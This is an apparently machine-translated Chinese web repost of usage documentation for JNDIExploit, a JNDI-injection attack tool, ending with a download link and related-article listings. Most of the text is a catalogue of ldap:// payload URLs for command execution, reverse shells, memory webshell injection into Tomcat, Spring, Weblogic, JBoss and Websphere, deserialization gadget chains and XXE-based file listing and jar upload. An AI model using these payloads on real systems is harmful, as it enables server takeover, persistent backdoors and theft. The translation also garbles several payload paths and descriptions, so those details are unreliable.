【JNDI注入利用工具】JNDIExploit v1.1

【JNDI注入利用工具】JNDIExploit v1.1# 简介
JNDIExploit一款用于 JNDI注入 利用的工具,大量参考/引用了 Rogue JNDI 项目的代码,集成了JDNI注入格式&#xff0

# 简介

JNDIExploit是JNDI注入和利用的工具。它引用/引用了Rogue JNDI项目的大量代码,打开服务器后可以更方便地使用。集成了绕过更高版本JDK的常用方法,适合用在直接内存嵌入、shell等自动化工具中。

详细使用文档:JNDIExploit/README.md

# 相关截图

# 快速使用

##服务端

快速打开JNDIExploit服务器,默认开放LDAP服务端口1389和HTTP服务端口3456,并绑定导出IP。

我们建议使用JDK8 来启用此服务。否则,服务器在使用LDAP 时可能会报错。

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 退出IP

##客户端(注入端)

在服务器上键入命令java -jar JNDIExploit-1.3-SNAPSHOT.jar -u 以查看支持的JNDI 注入格式,或查看以下列表。

支持的LADP 查询

* 发送到LDAP 服务器时,所有单词不区分大小写。

[+] 基本查询: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params],例如:

ldap://127.0.0.1:1389/基本/Dnslog/[域名]

ldap://127.0.0.1:1389/基本/命令/[cmd]

ldap://127.0.0.1:1389/基本/命令/Base64/[base64_encoded_cmd]

ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port] —Windows不支持

ldap://127.0.0.1:1389/基本/TomcatEcho

ldap://127.0.0.1:1389/基本/SpringEcho

ldap://127.0.0.1:1389/基本/WeblogicEcho

ldap://127.0.0.1:1389/基本/TomcatMemshell1

ldap://127.0.0.1:1389/Basic/TomcatMemshell2 —需要附加标头[Shell: true]

ldap://127.0.0.1:1389/基本/JettyMemshell

ldap://127.0.0.1:1389/基本/WeblogicMemshell1

ldap://127.0.0.1:1389/基本/WeblogicMemshell2

ldap://127.0.0.1:1389/基本/JBossMemshell

ldap://127.0.0.1:1389/基本/WebsphereMemshell

ldap://127.0.0.1:1389/基本/SpringMemshell

[+] 反序列化Queries: ldap://127.0.0.1:1389/反序列化/[GadgetType]/[PayloadType]/[Params],例如:

ldap://127.0.0.1:1389/反序列化/URLDNS/[域]

ldap://127.0.0.1:1389/反序列化/CommonsCollectionsK1/Dnslog/[域]

ldap://127.0.0.1:1389/反序列化/CommonsCollectionsK2/Command/Base64/[base64_encoded_cmd]

ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils1/ReverseShell/[ip]/[port] —Windows不支持

ldap://127.0.0.1:1389/反序列化/CommonsBeanutils2/TomcatEcho

ldap://127.0.0.1:1389/反序列化/C3P0/SpringEcho

ldap://127.0.0.1:1389/反序列化/Jdk7u21/WeblogicEcho

ldap://127.0.0.1:1389/反序列化/Jre8u20/TomcatMemshell1

ldap://127.0.0.1:1389/反序列化/CVE_2020_2555/WeblogicMemshell1

ldap://127.0.0.1:1389/Deserialization/CVE_2020_2883/WeblogicMemshell2 —也支持其他memshell

[+] Tomcat绕过查询

ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[域]

ldap://127.0.0.1:1389/TomcatBypass/命令/[cmd]

ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]

ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port] —Windows不支持

ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho

ldap://127.0.0.1:1389/TomcatBypass/SpringEcho

ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell1

ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell2 —需要附加标头[Shell: true]

ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell

[+] GroovyBypass 查询

ldap://127.0.0.1:1389/GroovyBypass/命令/[cmd]

ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd]

[+] Websphere绕过查询

ldap://127.0.0.1:1389/WebsphereBypass/List/file=[文件或目录]

ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[域]

ldap://127.0.0.1:1389/WebsphereBypass/upload/command/[cmd]

ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]

ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port] —不支持Windows

ldap://127.0.0.1:1389/WebsphereBypass/上传/WebsphereMemshell

ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path] —-e.g:/././././tmp/jar_cache7808167489549525095.tmp

当前支持的所有PayloadType 为:

Dnslog:与DNSLog平台配合使用,当命令包含特殊字符时执行命令。 ReverseShell: 是Linux 系统上使用的反弹shell。 TomcatEcho: 用于当中间件为Tomcat时回显命令执行结果。添加自定义headercmd: whoami 方法并向其传递您要运行的命令。 SpringEcho: 用于回显命令。如果框架是SpringMVC/SpringBoot,则传递要执行的命令。如果中间件是Weblogic,则使用whoami添加自定义headercmd:并传递要执行的命令。 Whoami.TomcatMemshell1:用于注入Tomcat内存shell,支持Behiner shell和Basic cmd shell。 TomcatMemshell2:用于支持Tomcat内存shell,必须添加额外的HTTP HeaderShell: SpringMemshell: 用于嵌入Spring 内存shell,支持Behiner shell 和基本cmd shell WeblogicMemshell1: 用于嵌入Weblogic 内存shell,支持Behiner shell 和基本cmd shell WeblogicMemshell2: 用于嵌入Weblogic 内存shell 使用并支持Behind。 shell 和基本的cmd shell。我们推荐这种方法。 JettyMemshell:用于嵌入Jetty内存shell,支持Behiner shell和Basic cmd shell。 JBossMemshell:用于嵌入JBoss内存shell,支持Behiner shell和Basic cmd shell。 WebsphereMemshell: 用于嵌入Websphere内存shell并支持: Behinder shell 和Basic cmd shell 都是shell 当前支持的GadgetType。

URLDNSCommonsBeanutils1CommonsBeanutils2CommonsCollectionsK1CommonsCollectionsK2C3P0Jdk7u21Jre8u20CVE_2020_2551CVE_2020_2883WebsphereBypass 的三个操作:

列表:根据XXE显示目标服务器上的目录或文件内容。 上传:根据XXE jar协议将恶意jar包上传到目标服务器的临时目录。

# 下载

恭喜您发现了这个宝石般的网站。您可以点击它并查看。你不会后悔的!

[JNDI注入利用工具] JNDIExploit v1.1 – Tokiren GetShell (get-shell.com)https://get-shell.com/4004.html

#【JNDI注入漏洞工具】以上JNDIExploit v1.1相关内容来源网络,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92815.html

(0)
CSDN's avatarCSDN
上一篇 2024年7月4日 下午4:35
下一篇 2024年7月4日 下午4:35

相关推荐

  • ai数学编程学什么内容

    AI数学编程主要学习以下4个内容:1、概率论与统计、2、线性代数、3、微积分、4、优化算法。其中,概率论与统计是构建和理解AI模型的重要组成部分,包括数据分布、期望和方差等概念,以…

    网站运维 2024年5月12日
    0
  • Web基础与HTTP协议

    Web基础与HTTP协议一、Web基础 Web基础知识,包含域名的概念,DNS原理,静态网页和动态网页的相关知识。
    一、1 域名和 DNS
    1.域名的概念         网络是基于 TCP/I

    网站运维 2024年7月5日
    0
  • 国内OA系统库存介绍

    微鳄365微鳄365是一款软硬件结合的一体化智能解决方案,集成办公OA、营销CRM、PLM产品生命周期、生产ERP等一体。其特性以简单实用、灵活扩展为主,为企业

    2024年9月20日
    0
  • DNS域名解析服务(dns域名解析服务器的作用)

    DNS域名解析服务 DNS域名解析服务 一、BIND 域名服务基础DNS 系统的作用及类型BIND的安装和配置文件 二、使用BIND构建域名服务器缓存域名服务器的应用环境构建缓存域名服务器 实验报告 一、BIND 域名服务基础
    DNS 系

    网站运维 2024年7月26日
    0

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注